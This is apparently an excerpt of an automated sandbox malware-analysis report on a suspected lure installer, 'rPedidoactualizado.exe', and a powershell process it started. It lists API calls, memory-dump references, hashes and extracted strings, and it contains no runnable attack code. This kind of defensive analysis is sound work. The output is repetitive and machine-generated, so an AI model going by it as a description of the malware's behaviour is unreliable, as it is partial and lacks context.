                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWidelstrlen
                                          • String ID: C:\Users\user\AppData\Local\Temp\nsx2132.tmp
                                          • API String ID: 3109718747-3603578921
                                          • Opcode ID: bac47df6fb5c15672e847bcd90d072063b8e9d74f7c5b2892f2d21255f34aeb3
                                          • Instruction ID: 4bb1670e371a3de23f361dcee459543bcfcf4636ee0f51b5b5a9e7d0ab821041
                                          • Opcode Fuzzy Hash: bac47df6fb5c15672e847bcd90d072063b8e9d74f7c5b2892f2d21255f34aeb3
                                          • Instruction Fuzzy Hash: DB11CB72A05300BEDB046FB18E8999F7664AF54399F20843FF502F61D1D9FC89415B5E
                                          APIs
                                          • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,?,?,75923420,004059C9,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405C25
                                          • CharNextW.USER32(00000000), ref: 00405C2A
                                          • CharNextW.USER32(00000000), ref: 00405C42
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\nsx2132.tmp, xrefs: 00405C18
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: CharNext
                                          • String ID: C:\Users\user\AppData\Local\Temp\nsx2132.tmp
                                          • API String ID: 3213498283-3603578921
                                          • Opcode ID: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
                                          • Instruction ID: 6a9d977fbe5713998eb834b7ad01fe533960ca492682b5c2b36711c34b001c28
                                          • Opcode Fuzzy Hash: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
                                          • Instruction Fuzzy Hash: DDF0F061808B1095FB3176644C88E7B66BCEB55360B04803BE641B72C0D3B84DC18EAA
                                          APIs
                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403359,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 00405B72
                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403359,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 00405B7C
                                          • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B8E
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B6C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: CharPrevlstrcatlstrlen
                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 2659869361-823278215
                                          • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                          • Instruction ID: 803477e47080facc391f0cecd2807ccdb00b9d1fdb40608b9d44cb66137c19bb
                                          • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                          • Instruction Fuzzy Hash: 3BD0A731501A30AAC111BB449D04DDF72ACDE45304342047FF101B31A2C7BC2D5287FD
                                          APIs
                                          • DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
                                          • GetTickCount.KERNEL32 ref: 00402EAA
                                          • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                          • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                          • String ID:
                                          • API String ID: 2102729457-0
                                          • Opcode ID: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
                                          • Instruction ID: b514363a92e965461d88eaa206c20d0702a544c8e4880045d1c7c79aac8a479e
                                          • Opcode Fuzzy Hash: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
                                          • Instruction Fuzzy Hash: 3AF05E30966A21EBC6606B24FE8CA8B7B64FB44B01711887BF001B11B4DA7C4892CBDC
                                          APIs
                                            • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                            • Part of subcall function 00405C17: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,?,?,75923420,004059C9,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405C25
                                            • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C2A
                                            • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C42
                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsx2132.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,?,?,75923420,004059C9,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405CCD
                                          • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsx2132.tmp,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,?,?,75923420,004059C9,?,C:\Users\user\AppData\Local\Temp\,75923420), ref: 00405CDD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                          • String ID: C:\Users\user\AppData\Local\Temp\nsx2132.tmp
                                          • API String ID: 3248276644-3603578921
                                          • Opcode ID: f876970076993f733f9246bd8c2efe22564afd40dcf2357ec22258bdd39e6079
                                          • Instruction ID: 850bfc7ffc9f89e8bebb6f59b63454ed566b5c4d810398842941662e03732b0e
                                          • Opcode Fuzzy Hash: f876970076993f733f9246bd8c2efe22564afd40dcf2357ec22258bdd39e6079
                                          • Instruction Fuzzy Hash: 82F0D625019F5216F622363A4D09AAF1954CE82364B0A013FF891722C1DB3C8942DD6E
                                          APIs
                                          • IsWindowVisible.USER32(?), ref: 004052A2
                                          • CallWindowProcW.USER32(?,?,?,?), ref: 004052F3
                                            • Part of subcall function 0040425A: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040426C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: Window$CallMessageProcSendVisible
                                          • String ID:
                                          • API String ID: 3748168415-3916222277
                                          • Opcode ID: 1596ab6e3354de94528cf133c19516d9ce94324b0b8efb63eeb8625a5778ab08
                                          • Instruction ID: beea61cd65c8703650dc93cdae6e0720761c29505c5582e3341eda9a3c117467
                                          • Opcode Fuzzy Hash: 1596ab6e3354de94528cf133c19516d9ce94324b0b8efb63eeb8625a5778ab08
                                          • Instruction Fuzzy Hash: BD01BC71200608AFEB208F11DD80AAB3B25EF85355F20807FFA01761D0C73A8C919F2E
                                          APIs
                                          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75923420,004038CA,004036E0,00000006,?,00000006,00000008,0000000A), ref: 0040390C
                                          • GlobalFree.KERNEL32(00000000), ref: 00403913
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403904
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: Free$GlobalLibrary
                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 1100898210-823278215
                                          • Opcode ID: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
                                          • Instruction ID: 827a6d7c30b52d61f5a2dbff04e35f254d4b7381da6d9dc608e34789494937b8
                                          • Opcode Fuzzy Hash: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
                                          • Instruction Fuzzy Hash: 58E0CD334010205BC6115F04FE0475A77685F45B22F16003BFC807717147B41C538BC8
                                          APIs
                                          • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rPedidoactualizado.exe,C:\Users\user\Desktop\rPedidoactualizado.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BBE
                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rPedidoactualizado.exe,C:\Users\user\Desktop\rPedidoactualizado.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BCE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: CharPrevlstrlen
                                          • String ID: C:\Users\user\Desktop
                                          • API String ID: 2709904686-1246513382
                                          • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                          • Instruction ID: d1e11866c06308db2688671cfe2e39cf8e5f3b64411c1caee3e249c785e2e979
                                          • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                          • Instruction Fuzzy Hash: BDD05EB34109209AC3126B08DC00D9F77BCEF11301746486AF440A6161D7786C8186AD
                                          APIs
                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D02
                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D1A
                                          • CharNextA.USER32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D2B
                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D34
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: lstrlen$CharNextlstrcmpi
                                          • String ID:
                                          • API String ID: 190613189-0
                                          • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                          • Instruction ID: 076f441daad098c1e87a0755c7bbd60db18a276d6ce73f7d9d897af98e652dc6
                                          • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                          • Instruction Fuzzy Hash: E5F0F631204918FFC7129FA4DD0499FBBB8EF06354B2580BAE840FB211D674DE01AFA8
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2344557722.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_51f0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 17ea1b0231e98245f4a98bbcfbc9a7f19156093838d0216aa2b63b9d93a1b732
                                          • Instruction ID: 53f561d0f3f6706a96e7eb3c62af68164cc4975fbdc05ccff1ca87d625f7162e
                                          • Opcode Fuzzy Hash: 17ea1b0231e98245f4a98bbcfbc9a7f19156093838d0216aa2b63b9d93a1b732
                                          • Instruction Fuzzy Hash: D6529E34B01319CFCB64DF24D854AADBBB7FF85204F1442A9DA0AA7361EB349946CF52
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2349721516.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7b70000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$}l$}l
                                          • API String ID: 0-2033858819
                                          • Opcode ID: 6f14193d3ce33bfddd83f8cccd332ea924179210b8bc1e6e3ba448cf60cbbb6a
                                          • Instruction ID: 0a1b290eabe833cac5db5b7799fc5154bcc71f143429a8c65c70cd1c83527cd8
                                          • Opcode Fuzzy Hash: 6f14193d3ce33bfddd83f8cccd332ea924179210b8bc1e6e3ba448cf60cbbb6a
                                          • Instruction Fuzzy Hash: B2A291B0B10204CFEB24CB68C590BADBBB2EF85714F6185A9E9156B341CB72ED45CF91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2349721516.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7b70000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$tP]q$tP]q$x.xk$x.xk$-xk$-xk
                                          • API String ID: 0-82941372
                                          • Opcode ID: 2d85a462cec4b0ac29fbac956e983d6dee44525c063f5781208359863a15c4e3
                                          • Instruction ID: d36f17149241f8ca8237ba874fd9ae4e4f47acc9b6b47e52ef408c005b8694f9
                                          • Opcode Fuzzy Hash: 2d85a462cec4b0ac29fbac956e983d6dee44525c063f5781208359863a15c4e3
                                          • Instruction Fuzzy Hash: 5382AEB0B002459FEB24DB58CA51BAABBF2EF85314F10C4E9D9199B351CB32DD45CBA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2349721516.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7b70000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$}l
                                          • API String ID: 0-1385878731
                                          • Opcode ID: a115bcc39abf38f7d0c64396569bc06acc2cd107f4f2ce5443ad2b605256f02c
                                          • Instruction ID: 0e8c90647cf4dbd16df571e9792ec021a5a914bb3f1474953fa951c723a991bf
                                          • Opcode Fuzzy Hash: a115bcc39abf38f7d0c64396569bc06acc2cd107f4f2ce5443ad2b605256f02c
                                          • Instruction Fuzzy Hash: 9282A2B0A10204DFEB24CB58C580BADBBB2EF85715F6185A9E9156F342CB72ED41CF91
                                          Strings
                                          Memory Dump Source
